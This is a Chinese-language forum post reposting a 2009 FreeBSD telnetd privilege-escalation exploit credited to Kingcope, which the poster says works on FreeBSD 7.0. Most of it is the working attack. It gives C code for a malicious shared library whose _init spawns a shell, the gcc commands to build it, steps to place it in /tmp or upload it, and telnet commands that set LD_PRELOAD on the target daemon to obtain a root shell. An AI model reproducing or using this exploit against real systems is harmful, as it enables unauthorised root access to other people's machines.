注册
登录
| 关键词: snip libno FreeBSD include telnet program PRELOAD ALEX remote 文文 |
文文 没想到现在有人会研究,看到后惊叹了一下。是telnetd部分的问题,在FreeBSD7.0正式版测试通过,7.1似乎也有同样问题,但未经过测试。有兴趣的朋友可以调试一下,代码如下: # FreeBSD telnetd local/remote privilege escalation/code execution # remote root only when accessible ftp or similar available # tested on FreeBSD 7.0-RELEASE # by Kingcope/2009 #include #include #include #include void _init() { FILE *f; setenv("LD_PRELOAD", "", 1); system("echo ALEX-ALEX;/bin/sh"); } ---snip----- Then we compile this stuff. ---snip----- #gcc -o program.o -c program.c -fPIC #gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles ---snip----- Then we copy the file to a known location (local root exploit) ---snip----- #cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 ---snip----- ...or we upload the library through any other available attack vector. After that we telnet to the remote or local FreeBSD telnet daemon with setting the LD_PRELOAD environment variable to the known location as a telnet option before. ---snip----- #telnet />auth disable SRA />environ define LD_PRELOAD /tmp/libno_ex.so.1.0 />open target ---snip----- ALEX-ALEX #ROOTSHELL |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
